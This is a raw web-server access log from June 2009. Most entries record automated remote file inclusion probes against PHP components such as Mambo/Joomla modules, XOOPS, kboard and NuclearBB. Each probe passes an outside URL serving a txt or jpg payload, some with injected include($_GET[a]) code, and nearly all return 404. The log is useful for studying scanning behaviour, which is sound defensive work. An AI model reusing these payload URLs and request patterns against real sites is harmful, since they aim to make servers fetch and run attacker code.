72.82.228.83 - - [26/Jun/2009:05:41:00 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:41:00 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:05:41:00 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
91.195.124.10 - - [26/Jun/2009:05:41:54 -0500] "GET /logs/access_log.1231286400//add.php?APB_rp=http://www.playxiangqi.com/images/flags/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
65.55.106.236 - - [26/Jun/2009:05:41:56 -0500] "GET /logs/access_log.1127520000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [26/Jun/2009:05:45:21 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:45:21 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:45:21 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:45:21 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.55.106.131 - - [26/Jun/2009:05:48:55 -0500] "GET /logs/access_log.1231718400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [26/Jun/2009:05:49:41 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:49:41 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:49:44 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:05:49:44 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.188.219.52 - - [26/Jun/2009:05:58:37 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt%0D? HTTP/1.1" 404 359 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
210.188.219.52 - - [26/Jun/2009:05:58:37 -0500] "GET /logs/access_log.1240358400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt%0D? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
210.188.219.52 - - [26/Jun/2009:05:58:37 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt%0D? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
210.188.219.52 - - [26/Jun/2009:05:58:38 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:05:58:39 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:05:58:39 -0500] "GET /logs/access_log.1240358400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:05:59:16 -0500] "GET /logs/access_log.1239926400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:05:59:20 -0500] "GET /logs/access_log.1239926400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt%0D? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.16.182.130 - - [26/Jun/2009:06:00:12 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:00:12 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:00:12 -0500] "GET /logs/access_log.1240358400/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
208.80.195.44 - - [26/Jun/2009:06:00:12 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {543B4D99-A991-446C-AFCE-A657D5CB6F32}; SV1; .NET CLR 1.1.4322)"
83.16.182.130 - - [26/Jun/2009:06:00:19 -0500] "GET /logs/access_log.1241827200/akocomments.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
210.188.219.52 - - [26/Jun/2009:06:00:52 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.188.219.52 - - [26/Jun/2009:06:00:52 -0500] "GET /logs/access_log.1240358400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.188.219.52 - - [26/Jun/2009:06:00:52 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.188.219.52 - - [26/Jun/2009:06:00:53 -0500] "GET /logs/access_log.1242000000//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt%0D? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
210.188.219.52 - - [26/Jun/2009:06:01:05 -0500] "GET /logs/access_log.1240358400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:06:01:05 -0500] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:06:01:05 -0500] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:06:01:34 -0500] "GET /logs/access_log.1242000000//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.188.219.52 - - [26/Jun/2009:06:01:51 -0500] "GET /logs/access_log.1239926400//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
190.144.44.36 - - [26/Jun/2009:06:02:02 -0500] "GET /logs///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
190.144.44.36 - - [26/Jun/2009:06:02:02 -0500] "GET ///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://genio.do.am/_ld/0/1_id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.16.80.63 - - [26/Jun/2009:06:02:29 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://87.117.231.182/ss.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
87.16.80.63 - - [26/Jun/2009:06:02:29 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://87.117.231.182/ss.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
65.55.106.231 - - [26/Jun/2009:06:02:54 -0500] "GET /logs/access_log.1148601600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.188.219.52 - - [26/Jun/2009:06:03:06 -0500] "GET /logs/access_log.1242000000//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
210.188.219.52 - - [26/Jun/2009:06:03:21 -0500] "GET /logs/access_log.1242000000//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.2data.nl/images/portfolio/idfeelcomz.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.55.106.183 - - [26/Jun/2009:06:03:28 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.97 - - [26/Jun/2009:06:06:46 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.230.156.161 - - [26/Jun/2009:06:10:16 -0500] "GET /logs/access_log.1235347200///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:16 -0500] "GET /logs///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:16 -0500] "GET ///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:24 -0500] "GET ///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:24 -0500] "GET /logs///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:24 -0500] "GET /logs/access_log.1235347200///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
211.230.156.161 - - [26/Jun/2009:06:10:25 -0500] "GET /logs/access_log.1236038400///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
123.125.64.38 - - [26/Jun/2009:06:12:52 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.106.133 - - [26/Jun/2009:06:20:56 -0500] "GET /logs/access_log.1129939200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.170 - - [26/Jun/2009:06:29:24 -0500] "GET /logs/access_log.1226793600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [26/Jun/2009:06:30:28 -0500] "GET /logs//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:30:28 -0500] "GET /logs/access_log.1239667200//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:30:28 -0500] "GET //common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:30:28 -0500] "GET /logs/access_log.1239580800//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:04 -0500] "GET /logs/access_log.1241654400//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:04 -0500] "GET //common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:05 -0500] "GET /logs/access_log.1239580800//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:05 -0500] "GET /logs//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:06:31:07 -0500] "GET //common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:06:31:07 -0500] "GET /logs/access_log.1239580800//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:06:31:07 -0500] "GET /logs/access_log.1241654400//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [26/Jun/2009:06:31:07 -0500] "GET /logs//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:19 -0500] "GET /logs/access_log.1241654400//common/db.php?commonpath=http://netseoul.com/board/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:28 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:28 -0500] "GET /logs/access_log.1240012800/htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:28 -0500] "GET /logs/access_log.1240617600/htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:31:28 -0500] "GET /htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:32:15 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:06:32:15 -0500] "GET /logs/access_log.1241654400/htmltonuke.php?filnavn=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.136.20.14 - - [26/Jun/2009:06:36:50 -0500] "GET /logs///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kuettner.it/yes.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:06:36:51 -0500] "GET ///xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kuettner.it/yes.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
83.16.182.130 - - [26/Jun/2009:06:37:42 -0500] "GET /avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:37:42 -0500] "GET /logs/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:37:42 -0500] "GET /logs/access_log.1241740800/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:37:42 -0500] "GET /logs/access_log.1239494400/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:37:52 -0500] "GET /logs/access_log.1241827200/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:06:39:05 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:06:39:05 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
218.30.100.97 - - [26/Jun/2009:06:39:05 -0500] "GET /logs/access_log.1238889600//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:39:21 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:39:21 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:39:22 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:39:25 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.221.37.118 - - [26/Jun/2009:06:40:07 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.0" 404 287 "-""Mozilla/5.0"
66.221.37.118 - - [26/Jun/2009:06:40:07 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.0" 404 282 "-""Mozilla/5.0"
66.221.37.118 - - [26/Jun/2009:06:40:07 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.0" 404 309 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:40:23 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:40:23 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:40:23 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:40:52 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:40:52 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:40:52 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.221.37.118 - - [26/Jun/2009:06:41:22 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.0" 404 311 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:41:29 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.172.33.230 - - [26/Jun/2009:06:42:10 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:43:02 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:43:02 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.165.73.157 - - [26/Jun/2009:06:43:02 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:43:04 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:43:04 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:43:04 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
75.125.198.130 - - [26/Jun/2009:06:43:04 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kuettner.it/baner.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:06:44:11 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:06:44:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:06:44:55 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:06:44:58 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
83.16.182.130 - - [26/Jun/2009:06:45:49 -0500] "GET /avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:45:49 -0500] "GET /logs/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:45:49 -0500] "GET /logs/access_log.1239494400/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:45:49 -0500] "GET /logs/access_log.1241740800/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:06:46:27 -0500] "GET /logs/access_log.1241827200/avatar.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
